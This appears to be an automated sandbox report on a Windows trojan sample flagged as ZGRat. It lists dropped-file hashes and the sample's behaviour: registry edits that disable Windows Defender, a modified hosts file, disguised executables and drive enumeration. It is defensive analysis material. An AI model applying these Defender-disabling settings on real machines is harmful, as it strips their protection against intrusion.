SHA512 6464d0393df7292169b920b729a99731605699d1e8080fbcbe714ac85b0a51bd7d52282247f6e0b8b22de8f7baa5101182eedb45d6375160657773f90d4aa19a

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\gauge\lib\themes.js

MD5 efe93779c76fff0cb66101238dff30e6
SHA1 0531c3c5b353baab97bd347354566af214a214a4
SHA256 6a2da219cfc714ffaacde2afb26a5dc3025baa9f984fb1191e69a2e0e0c502d8
SHA512 788e9d371a0824953f7e2cb4b25b7700e699184118ff01d5ee074bb3bb68b7e062781425f5205a8caeaedda8aa6ca4fbd3d94eb1f1ffcc8e1f4ad7ae76457254

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\gauge\lib\theme-set.js

MD5 10bc47f2ccada730a0d544caa1bfb745
SHA1 36d09fbc9383eafbec496b336cef184eca0dbf13
SHA256 f7b13a94bbc5e1796f407f6951c452192a7084663b467e735f2c9f9957292409
SHA512 fddfa21b91719df0a69a02313502aa69ea894b2f07dc6cb1a1b8ca637be2b423c24e62dd11f907d859c1cbb1eb1cea7a9fee0f7954f8164ebe98f4a154e2b491

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\gauge\lib\template-item.js

MD5 f0ca63be83f97fad471abe7e2bc09754
SHA1 9bb0e93dc258fa396a9cd84870c477465c6a6225
SHA256 de035282bf53b20e4a2b79a734ad9088e10d0b34bbf0d40571b138d0e144ca55
SHA512 78b37f1e2058770938495f78012eb4328544f0b0f016d12a16f5261190c575c73380a6856491b6ceaceeac95ca0dd9c81716436bb44facbaa3409d91d2ba08ab

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\gauge\lib\spin.js

MD5 35d56b687e0e510544d77fb01f350406
SHA1 b2a1975a8a0d714909fe8d5056804700fefd11d3
SHA256 4ddb202944fd4e556edc68107b1a1f33dd25f1910876d2bf04eb5a58ae060c9d
SHA512 d1a19d4aa31dbd4b1793cdfd9b388004e948636c86caa48120e49a252f3922f4c611c9ec70fa3ab043042c4797c89248607a627025eea1483c2327751f880b95

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\gauge\lib\set-interval.js

MD5 cf1c3e0e4bc3b07adf812b1c70e8bdbd
SHA1 5c2c33590101b8947fdfe9a22ba1d17b1f1e4d70
SHA256 19d2fa52118a39a7810efeb7bce45418f3e55ee7b445c85811d07a2f73b7bbb7
SHA512 d4d9f8dd9c997ecaf5a45a88e6627747701b38995efc956caf611a3679499896c08134a797c51a90b0a5a1dad71b0c6a7f65badec68f568f9655bd486c7894e4

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\gauge\lib\set-immediate.js

MD5 e5cb7c218a0f9437498fa48539dd3dd2
SHA1 0ee3511b6dac6bd821ff613bc07feafe664ccf3f
SHA256 90dbb2e127d9b971731b2094b2516a463243e4074367dd4129fe2849ef598514
SHA512 d712323110de5977513f9bcfd945bbb3310a4c45dac8cac949a27f7e99f20e0a1a63e200e8bfdc56aa756e3fc670724e953521cbc6c3a2a2e06afadcf845dcd1

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\gauge\lib\render-template.js

MD5 cf43109055cafca38dac321184ccc156
SHA1 dbdaa677b6ecccbc84af96c665d37104db42b092
SHA256 24b1e5d87bee1b0334c6b7e92c9883f8c818568c88dd3f009792d76daf5f4d65
SHA512 67b5ae37077e8c9fb9b97cc674c550c3be156c273453f3343829a8c3da3050ed60226c1907975c558c1c7ce3f48182494fb8a67accf25685ec4ab40bcf08d041

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\gauge\lib\progress-bar.js

MD5 aa35e2f28213533f809e8b5f9eecbef9
SHA1 3c6dc3b1d35c115d4e712647941b6223a54f4062
SHA256 e0bf26e14228cb79c8c763e345f0fd5b6da71e4564e1229ad2b8c40124e1d16b
SHA512 817b2375dc4d57de2367f9b0353896c6508ff377453d0cd639af93a1d0d4123a5e7df369339a68fb379a7876a21c990b7a55a1baf835816a4362e13fd17e97d7

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\gauge\lib\process.js

MD5 337306f3fc6274ecd4f9e7c7ceeffb1d
SHA1 8710bc75e47006d96f52c5a8ce8ac224f3e2356d
SHA256 742bd2d12a7786e595955c8a846dbefe88591df39c2659491bddadbb8ed7dae6
SHA512 ddbb842e803e1f170adf8ef41e209eb2cd0b857f2605e816ebefae3f4c9bc40f70a4fb1b32fbfeed04ed2465d8d19be573a3958df51df7503817766a705a9de4

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\gauge\lib\plumbing.js

MD5 ea9b89a82c6935dd42f43f4a91cd4b3e
SHA1 ced271efe695d542670cc84c98435590956d97e8
SHA256 1e7982a4080950347c5c4a33c6a4e7e6e5a6c0ae0e0fb87301e62b48fc3a75f1
SHA512 2d47928ddcb872fb0336ee5fac0389dbbf94a2a1148005783a67ae0cab9a2707f0beca660aaffb2383602f42e2d41f5bcf4b03924828613ab8e36c74e9a1f5f3

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\gauge\lib\has-color.js

MD5 12bdbddc59cab41a8daa15925d883576
SHA1 c98472fff9ca49b7df18eb1ff15d41cb0d2af64d
SHA256 bc77cc5732b948d7fe113b31ff78972d6ea336f8d15e8547542007657d41dc30
SHA512 087b2aa7b423b7f173096091b36cce6269df4d768ae80fe818044360114753d7f5d968ab8f1c0b3c8c130cbc45176ac7e6a9369325ffbad3e6b89c43c39a71c2

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\gauge\lib\error.js

MD5 528e2cb56f65929aa4376e585005f1a4
SHA1 04e38f90829460d150c24677f678be9c59a1986d
SHA256 2957dc2045a462606df224526d880fcc7a472bc992a74b0db9b23bf1984a9b20
SHA512 c49eee8427b3315ea6866f094c55db240b6d7d889a520cc3fb0400ecd25d59c064e9c137fb004f657b03d2f21be56c00fb7abef9e0ef2462d8b9ad75c112eb6d

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\gauge\lib\base-theme.js

MD5 c2d6986c3f109d0207dd06ba223cfb27
SHA1 24692c6c9557e081c53383fadb23dff2fc77233d
SHA256 7a6f7058c9f54eb3ee04ed5b3e4afad0f3abfd0b658a040e85ae8f4a455b1d5d
SHA512 782a011f8af385dc2db12d1ea5ae92923ba156b5068e095de507d433af27f1ab0dbf4f0a8b83a39a6890a58067dafa5e1e4efe030f1978329f93699ce1b910ed

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\emoji-regex\es2015\index.js

MD5 8f12b24a27ff5f2381a4a1568475eaba
SHA1 975c292ad2c1f09c53d0c9f53db5e66fd26fbbfb
SHA256 8718dea4d28647912918dba60545890dc10ae672bfb186b6ec0af3fc5e826137
SHA512 b70e68def6e8b15cdc9ef8bfa1326611c4bf83ad8ac461511c6af1ee2acdaa182ae9336e1f7f8c171c9931d36d5d9347542d364605d714c81a90032afedf52e5

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\diff\lib\index.es6.js

MD5 b0189fc844758ea7861a33d4cf3deaa2
SHA1 42b196484a16db7a66eeb56906ed26e2182799fb
SHA256 69694883a1ee6ef36c17144e2eb41e5d75b8c0f487cae980fd536bcab5960931
SHA512 46558e8dfabdbf10c92cc41358526b4d779a5e256303032cfbfaaa966d0283881fdd97380d494066efb210172eb5a6544d5906a29972db2feb9a79c5f972b6ed

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cross-spawn\node_modules\which\package.json

MD5 6bcb9e5778d80ea1512a98d73d4e3c9a
SHA1 402837c5ba60f95b309957adc4657b8fe4fb1f05
SHA256 43010039ed5e89f7186960be682b3cb5cda5ab6cdfb06cbfd4f081cf0e7b4260
SHA512 4548011d1e4ed9f5d7fb5e408476a27b2a19f3beec5ac4a9bbddebc700a77ff0fb168ecc4917576a18f22d262f82649e9ec0c1242af752a7cfa0321ea4375aad

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cross-spawn\node_modules\which\bin\node-which

MD5 ab7317a95d1f704cb183d7c438a3e890
SHA1 5b6b3e1838316fb3f1b3b4194cdf49db0674eb17
SHA256 055f0ac4eed1a1591d033d59462972968bf3483b4cc07e163589569c0fb999f0
SHA512 322a3fdcbdc0ab2240acda547abe636d51f7f2114200491f7fc66c4353d43d37a4052df0d32f29ede80c8a768d312efae8ed28639f55c2e5a678f306a45986f9

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\chalk\source\vendor\supports-color\index.js

MD5 75cc7f0b87ad9e857bf71b18adfcc046
SHA1 84ef36e84894efaa7aba9c1643f00608e5f1d8d0
SHA256 13b5fc8a0b139d257260d1e625726744609c24a3b58535afbb602389997e60d6
SHA512 c6abdb670adac05d631526b91554c474a88b8143c9ea8ba25971e0d4fd69de9201dd2e0230a7e8655bff9ef497ae371d9f824dcbb9c1e83202c893001ef7542c

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cacache\lib\verify.js

MD5 c3067368e574aca2d0de5bf837b2aef3
SHA1 be0b21a75a7544e5fb7915e059c358236c329841
SHA256 898b7bf2cc4e694c80eedd1edb116c2bb3a6aad0085488d1547e5755ab53338d
SHA512 7313672dffdfd2ef948f62a57339669ef96dc3078dda77b84a7bfb50a569e8ebf3d00224ace32378d19249541380eee121ddd808aaf13acdebf36110c5fc212d

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cacache\lib\util\tmp.js

MD5 1d8e64ea848e005e1d0a771f1465a577
SHA1 cf9d2fe73fd6195f7b53c6b13cda15f40802f8f8
SHA256 9bc9bad862208b2ee66aeae5222d8b1d8d1d288f335fdf3ff998ad200f71ce64
SHA512 2a0a1d57ed240c9a0e95f1b87306eb66583860c2c88148db6ef5979f6f6f06e4bc6eec9fe9d6f2ad21506c4234a88404fcd155dabd82d6b507d0ba53502ad5be

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cacache\lib\util\hash-to-segments.js

MD5 4fde78cc8125248b8abf8a9831d497c1
SHA1 a6f608135b099314b8cb4bb36c206d2f93bf2585
SHA256 ed10c878cb3c2b8570a32954b52da3c49539549f64e36b3ce3ab38d7e524bf19
SHA512 11187c46ab16c06f8af585c0a5e55e4947da81c3967fb8d127e83c58079d4d0d4343023374ecaddef4f53123e232d9c2f396bd0dc8832a01e779b4cab4d7fc6e

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cacache\lib\util\glob.js

MD5 a93d25b2624be6221c62e3b3b437666d
SHA1 a4ce33b8a230dad740d44b6a4f74b4522e59fa4d
SHA256 a9fd56a76f0b4c39ffd94785128e79ddbc337210b9feb4b09530616948adeb69
SHA512 58baf4c9a29291ad3bc559f421e393a450e4332b13bd2f664a1fce45769493093c8327d97fc821d15790610b40015c0ca41596141216a2c121be42d1ab89b3c8

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cacache\lib\rm.js

MD5 308021f53c321c99e1a120e70f1aae22
SHA1 e8d9e66e76fee498d27baa38ffcfd3972f33be96
SHA256 5155f5560ed63bea74732c87d6a10732d5c6e5639785dcfdcdcf93a01943abf6
SHA512 b0ab2fadfa782230c424b3e91dd0eb560a188e998d7888ca80ce41ceed8cf71bdafe4c5039aa1a17a663d5502fc53188219c78452e0be62c72e5e56fdcdda766

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cacache\lib\put.js

MD5 19d056f5ccc691f09346ff0166058e6d
SHA1 070a4a3d6739c9808599c6f1dc860ee2aa7139b7
SHA256 b131954efbcb17f785e93278c53f4b0491c53009698b937ef68bbc7342134872
SHA512 de680e1a1370bc139697a55bd0987d798733dbed00edb78808a453bc1c2ba581e1c924ecb3cbb426e98a90693020e60956194307f7210b4e2d2b08f55ef047f4

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cacache\lib\index.js

MD5 8b736f68cbf8df8c159f752dff04e264
SHA1 c11f68d63488e208186e21037b97455d4c2b5489
SHA256 56745bdddf064be6ded0e82452c7327c3a960a82d5fb26b021aef41fa01e2b94
SHA512 1cac2602b4d0fcdf199f22e3420b335d9242ee4b1f446784d648aa3e48eb1c6e9481b15bd4bc6b8ecf39cd5869d2693df363425642834fee2d767e4dc84676a7

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cacache\lib\get.js

MD5 182421852249bfb3b527c046c9cb37f1
SHA1 065b24b2f79c0005b24f8bd80c271f3eae43ce55
SHA256 4127c3adb8bc9f530dcb6ed80a0c6c00288f1db8c6939146957d03454cac06c9
SHA512 4ba327b91b332c38c3f191d38f148d1f40e436a585dade62f7bb07b35eee25c62e10d8a252c0854673fe3a140bf9745ae3649e946a59bf54f7bafebff9ab5f11

memory/5604-7827-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cacache\lib\entry-index.js

MD5 e3581a4800e872c74d33d428a43c45bf
SHA1 5c9d813706a32b323f641680649ada4cef02a065
SHA256 75f21c2ef3b790dfd8a5feb97504988d904790f0d3d6468939177d7e9192a274
SHA512 133d25deea97d18b77fe6239ea481ea137270e3f331be08d514080e78b98a4d0133306685d70176010a4bb999af38921535f15720dcc173b0c3894f47816a2fa

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cacache\lib\content\write.js

MD5 851dde26bebe68f41e7b8488396d382a
SHA1 cef7a585557fdb45f906e449f9f99bad59dae7c5
SHA256 5af02bb8b36884b211d779d4c5e50c425ed9fd67b925f7e8becbc1750e4f7e8f
SHA512 273d241aa04831fcd40d8df8d5922285c8588d0a4bcaf5a058bd60beebba99ea506d9891f4ffe07edbf64dfa9563e05a4f14b7e5bc4f735d982a6e8f7827dc7c

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cacache\lib\content\rm.js

MD5 4e1bd0b7ec57f9b1f6ded18c48f327bc
SHA1 875d264c38047981031f7ca65d65b7d8523b5e3f
SHA256 f3f706375bbc097bc0fd091f0eea8d07b98b8e1f7a1d203f3b87337312272672
SHA512 bd2e2d5d96f230a0909a9063e9d105c4c0ae5815ccbe2dc4a0461b02aea06d9a0b79c4912b8bce00ebb9ddc73e40314ff7510a684ee28187f04f6dd5e212975f

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cacache\lib\content\read.js

MD5 a3738489fa3632ae7ecb44c63b38628d
SHA1 3c4e8f1e4799f5aa913204888f54d81e65e53ed6
SHA256 dbe618214f63c11a58aebdc97c3f646bc794df809f5c773e34efc9486202ce3e
SHA512 da19da7902acbc36c187682e13422fa141a886e63e78f2a555804e0ba0fd450ae89901e66e954d44ffbf680938b3c1445e190fdda24897dfa5b35ac79ec5a496

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cacache\lib\content\path.js

MD5 c66683453866ddccf0a4b5a817a3c87c
SHA1 e28059c54a7ca3cbb9b5b039db061a24e533d880
SHA256 7ec9682ee3472435d866bdd35d18e2d570ffe98621bc230f30d31443bd04d8f7
SHA512 a19345927f9275a09fd7b4f06858bba5b513751af3c91885face9435c923993a2862ea91eb6c6492208ee6eddd017f1b880ccd35f8ecbc86d0ea7af0d173d3da

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\brace-expansion\package.json

MD5 4b877fcf0149128acf15926c546b8b98
SHA1 7b48982e1637dd5dee1f571cd7c98054b46fb032
SHA256 4a9ae315ffc10674f4a71ea4465103e77426d86aeb2c23737607181f3f31344f
SHA512 c2197efe496db792bbefce4d68bbaf63204a53267e8a36bf476521718c5e67e418165dec16f260c521b18c4b54a65862fe94a1a2385c18c191565fa7da900db8

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\brace-expansion\index.js

MD5 795f787be90f6daf96d64087f2428723
SHA1 6c479385902b5adc1b4343472922324aa312296c
SHA256 6f6a12f42623bf53b6561d46c5e37c0f26b6471ba53e83c3b933fb2c2f139742
SHA512 f093a66ef5f0e79085195571421a3ebc7681bbe41add742fb5a7efbd660fc3f6ccd6e6c8a95c4334a91232b6e0a45aebb84539ef7fef05fa21c63e36d2757175

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\are-we-there-yet\lib\index.js

MD5 a9c06e81da780a0568fa5a53e8d7e4fe
SHA1 d154805f279e1f7708732426e960ab7990fffbe2
SHA256 7a427679a9b245f02d66bb09aeaa5337bdff29375d05f3f34e7133b61001bb69
SHA512 79c8f738b2397a79f192ea55e6145a4333c3b555c230d32840a06ca9daccc5b75f547ae56dcc28561f2d6aea9c033c24cab385e344d8697234654b6fd909ba2c

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\abbrev\LICENSE

MD5 e9c0b639498fbe60d17b10099aba77c0
SHA1 34d4249a8ef23970810fd3018b9399b1268dc052
SHA256 9e0d5c7989f7e9f07d7c4b158aceff270f235eb7464ace41c5e7b200834a43e0
SHA512 fba8220e3ddd6d455f36564e3c91c38a508a75d26eafba9b1f761216b1fa3fbb2a01a4736694d90fe81d4dd87f81d3215c8cc11a48f3d38d231dc4f3402d5adb

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\index.js

MD5 a6fc9ab578293c89852087b7b0d78552
SHA1 b443533358be43ae037f23cd250e3352ae1d6029
SHA256 c5bb23b3ca69e97ddefdb76724b1a7936ac18b5e47c3fe3c5391969d6e6d06f8
SHA512 d6795f2ddb1ce4dd0beec89cedb564e412183192cba97b4ca2baa7ba443638247cdcd87182e4680647d4f30b90c41c361a542b07d3c77eeec307c4689d76b052

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@isaacs\cliui\node_modules\string-width\package.json

MD5 6370fd65c542b20d05beb70fd94e5aeb
SHA1 53ae7a1b3953e86624927fec8421d453d9c88e41
SHA256 adbcb3b95ea29c1f2a91a0af600fd9136ce408a38622332848ba4630dc473659
SHA512 37be93a008f964cfdd4c92401e8a9b815ce51b6b5c8c711e0fbcabc119235d1f352a26c9d03c4203ef82e696c28606762474dfd5efc960e6b6df1afd47465729

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@isaacs\cliui\node_modules\string-width\index.js

MD5 e425955ccd341cf2b2b4b95366b687e7
SHA1 84e24b625a49263b8192b39507002656e64f8302
SHA256 4508758772b1f52850b576ca714bbfd6edb05f8d36492ceab573db47f5cd7d84
SHA512 258878009e1bbca7e3f91a2ced8c531dd46bab19dc26a39e0c8c00cea92feda5663e2d652f3a21eed87593d2f887f16fbb7a6aac0bf3e91a2843e102f5923059

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\package.json

MD5 4a14d4b54700538e3369c29f7e6f2379
SHA1 238c48183550d02ab5c0dd37e13d57006dce640a
SHA256 181fa046bdbb7d8958c57dcef2e63aea9af667036e218c7222479a8618375f1a
SHA512 d8234b8d250ca8f5a7fc6ca2d37a410824e1f9fd13decbbe488cd59bf138ade96f91eb712825539f84245fb6f1a2f784159c8a9d19ca880dc2710661e3282f30

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@isaacs\cliui\node_modules\ansi-regex\package.json

MD5 d2894a8ebbc4840e85527b8c051dac86
SHA1 dabd0c9882fb3b8c12222595fb92ad26b60671a1
SHA256 8a331bebfc9225b6afe7a15542843a78ba7943454b6261cfe60b734513e1d32c
SHA512 7266a2f0bbbc398c5e4a4f2d66670a205d1cd35f0d11a89840b56f221057776bdb54723d7d767ddbd1861379c01ac660fbbeb36dbb5374e53756ae9afbc63e8c

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@isaacs\cliui\node_modules\ansi-regex\index.js

MD5 4b05188fff08c3f12812c29561915d54
SHA1 bd2dec3594c15a8ed8cc9d45ee8c2a6fdedcfb37
SHA256 110c5fe554eccdda9b95be9a33edd4d4e867c8432460a8f39c9b7ff841b00772
SHA512 894b656903a1875c37c5d7cd9aa14fa7613961ffdbebc3ceda6d9ba766d46faf9369a811827389f6dcc101e65a7c935fb83e40aa707453fb203a675752370670

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\mock-globals\.gitignore

MD5 8da13f306c8c0f4f4a32960e93725b42
SHA1 b9ee3f4a8b64284a8f698206993e4ec2cf83f66f
SHA256 ca7a3d5544beb40beb598f6ae22527e8cbcbc29b67f241ad9e572a50a89848b0
SHA512 59e6493139d8a3af2889fb337032f41124a53f5ca7ee06906c97d4f6cf0fa942f28b3b7ce2d449b10ea0a01a39282397984ea46df43571d2a5fe753fc20bb6cc

memory/5148-3936-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/6424-7901-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/6424-7904-0x000001B1EE080000-0x000001B1EE090000-memory.dmp

memory/6424-8199-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/8868-8273-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/8868-8276-0x000001ABF9E30000-0x000001ABF9E40000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-18 19:06

Reported

2024-03-18 19:21

Platform

win11-20240221-en

Max time kernel

599s

Max time network

601s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

ZGRat

rat zgrat

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
N/A N/A C:\Windows\Installer\MSI1E94.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe N/A
N/A N/A C:\Windows\Installer\MSI4151.tmp N/A
N/A N/A C:\Windows\Installer\MSI4162.tmp N/A
N/A N/A C:\Windows\Installer\MSI4150.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
